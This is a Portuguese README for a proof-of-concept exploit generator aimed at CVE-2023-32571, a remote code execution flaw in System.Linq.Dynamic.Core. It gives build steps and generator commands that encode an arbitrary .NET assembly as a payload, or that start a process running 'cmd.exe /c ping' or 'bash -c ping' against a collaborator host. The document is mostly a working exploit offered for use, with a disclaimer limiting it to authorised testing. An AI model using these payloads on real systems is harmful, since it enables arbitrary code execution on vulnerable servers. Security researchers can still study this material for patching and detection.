
Prova de Conceito para CVE-2023-32571
Prova de Conceito para CVE-2023-32571, uma vulnerabilidade de execução remota de código no System.Linq.Dynamic.Core (1.0.7.10 a 1.2.25). Esta vulnerabilidade permite que atacantes executem código e comandos arbitrários quando entrada não confiável é analisada por métodos incluindo Where, Select, OrderBy.
Esta ferramenta é fornecida apenas para fins educacionais e de teste autorizados. O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. Os desenvolvedores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por este programa.
dotnet build --configuration Release
Payload/bin/Release/netstandard2.0/Payload.dllGenerator/bin/Release/net9.0/Generator.dllA ferramenta suporta dois modos:
# Usando codificação Base64
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 1
# Usando codificação Hex
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 0
# Usando codificação Base64
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 1
# Usando codificação Hex
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 0
# Execução de comando no Windows
./Generator --mode 1 --parameters "cmd.exe /c ping <your-collaborator-url>"
# Execução de comando no Linux
./Generator --mode 1 --parameters "bash -c ping <your-collaborator-url>"
--mode: Modo de exploração (0=AssemblyLoad, 1=ProcessStart)--file: Caminho para o assembly .NET a ser carregado (obrigatório no modo AssemblyLoad)--type: Nome de tipo totalmente qualificado para instanciar (obrigatório no modo AssemblyLoad)--parameters: Parâmetros baseados no modo:
--encoding: Método de codificação para o modo AssemblyLoad (0=Hex, 1=Base64)